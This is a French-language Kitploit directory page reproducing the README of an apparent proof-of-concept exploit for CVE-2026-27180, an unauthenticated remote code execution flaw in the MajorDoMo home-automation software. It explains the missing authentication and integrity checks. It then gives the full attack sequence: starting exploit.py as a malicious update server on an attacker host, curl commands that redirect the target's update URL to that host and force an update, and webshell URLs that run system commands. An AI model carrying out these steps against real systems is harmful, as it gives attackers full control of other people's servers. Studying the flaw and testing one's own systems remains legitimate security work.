Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27180-MajorDoMo-unauthenticated-RCE — Preuve de concept pour CVE-2026-27180, une RCE non authentifiée dans MajorDoMo via l'empoisonnement de l'URL de mise à jour, livrant un webshell à la racine web. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-27180-majordomo-unauthenticated-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubmbanyamer/cve-2026-27180-majordomo-unauthenticated-rce

CVE-2026-27180-MajorDoMo-unauthenticated-RCE

Preuve de concept pour CVE-2026-27180, une RCE non authentifiée dans MajorDoMo via l'empoisonnement de l'URL de mise à jour, livrant un webshell à la racine web.

Voir le dépôt
3il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MajorDoMo RCE (CVE-2026-27180)

Author Python License: MIT CVE-2026-27180 Exploit Type

Exécution de code à distance non authentifiée via empoisonnement de l'URL de mise à jour dans MajorDoMo

CWE-494 – Téléchargement de code sans vérification d'intégrité
Impact : Compromission totale du serveur via un webshell placé dans la racine web
Authentification requise : Aucune
Correctif : PR #1177

📜 Description

Ce dépôt contient un exploit de preuve de concept pour – une vulnérabilité critique d'exécution de code à distance non authentifiée dans le logiciel d'automatisation domotique .

CVE-2026-27180
MajorDoMo

Un attaquant peut :

  • Empoisonner l'URL de la source de mise à jour sans authentification
  • Forcer une mise à jour qui télécharge et extrait une archive tar malveillante
  • Placer des fichiers PHP arbitraires (y compris des webshells) directement dans la racine web

La vulnérabilité existe car :

  • Aucune vérification d'authentification sur les modes auto_update_settings et force_update
  • Aucune validation du certificat TLS (CURLOPT_SSL_VERIFYPEER = false)
  • Aucune vérification de signature / d'intégrité sur les paquets de mise à jour téléchargés
  • Les fichiers extraits sont copiés récursivement dans le document root

🛠️ Fonctionnalités

  • Script Python tout-en-un (aucun fichier externe requis)
  • Flux Atom malveillant + archive tar générés en mémoire
  • Webshell multi-méthodes protégé par mot de passe (poc.php)
  • .htaccess optionnel pour forcer l'exécution PHP
  • Sortie console propre avec commandes copier-coller

🚀 Installation

root@kitploit:~
git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# Aucun pip install nécessaire – utilise uniquement la bibliothèque standard + argparse

📊 Flux d'attaque du PoC

root@kitploit:~
graph TD
    A["Attacker starts malicious HTTP server\nserving /master.xml + /archive/master.tar.gz"] --> B["Attacker poisons update URL\nvia GET /objects/?module=saverestore&mode=auto_update_settings\n&set_update_url=http://attacker:8080"]
    B --> C["Attacker triggers update\nGET /objects/?module=saverestore&mode=force_update"]
    C --> D["MajorDoMo fetches poisoned Atom feed"]
    D --> E["Downloads malicious master.tar.gz\n(CURLOPT_SSL_VERIFYPEER=false)"]
    E --> F["Extracts tar.gz with tar xzvf ..."]
    F --> G["copyTree() copies files recursively\n→ poc.php & .htaccess land in web root"]
    G --> H["Attacker accesses webshell\nhttp://target/poc.php?pass=ChangeMe123&cmd=id"]

    style A fill:#f9d5e5,stroke:#333,stroke-width:2px
    style H fill:#c3e6cb,stroke:#333,stroke-width:2px

🖥️ Utilisation

Démarrez le serveur malveillant :

root@kitploit:~
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080

Après le démarrage du serveur, exécutez ces commandes contre la cible :

root@kitploit:~
# 1. Empoisonner la source de mise à jour
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'

# 2. Déclencher la mise à jour forcée
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'

Attendez 10 à 90 secondes, puis testez le webshell :

root@kitploit:~
# Exemples :
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a

⚠️ Avis légal et éthique

Ce code est fourni strictement à des fins éducatives, pour des tests de sécurité autorisés et des activités de red teaming.

  • N'utilisez PAS cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de test.
  • Une utilisation non autorisée peut violer des lois, notamment le Computer Fraud and Abuse Act (CFAA) et ses équivalents dans le monde entier.
  • L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce code.

📄 Licence

Licence MIT

Copyright © 2026 Mohammed Idrees Banyamer

La permission est accordée, gratuitement, à toute personne obtenant une copie de ce logiciel et des fichiers de documentation associés (le « Logiciel »), de traiter le Logiciel sans restriction, y compris, sans limitation, les droits d'utiliser, copier, modifier, fusionner, publier, distribuer, sous-licencier et/ou vendre des copies du Logiciel, et de permettre aux personnes auxquelles le Logiciel est fourni de le faire, sous réserve des conditions suivantes :

L'avis de copyright ci-dessus et cet avis de permission doivent être inclus dans toutes les copies ou parties substantielles du Logiciel.

LE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS, SANS LIMITATION, LES GARANTIES DE QUALITÉ MARCHANDE, D'ADÉQUATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. EN AUCUN CAS, LES AUTEURS OU TITULAIRES DU COPYRIGHT NE POURRONT ÊTRE TENUS RESPONSABLES DE TOUTE RÉCLAMATION, DE TOUT DOMMAGE OU DE TOUTE AUTRE RESPONSABILITÉ, QUE CE SOIT DANS LE CADRE D'UNE ACTION CONTRACTUELLE, DÉLICTUELLE OU AUTRE, DÉCOULANT DE, HORS DE OU EN RELATION AVEC LE LOGICIEL OU L'UTILISATION OU AUTRES TRANSACTIONS DU LOGICIEL.

Télécharger l’outil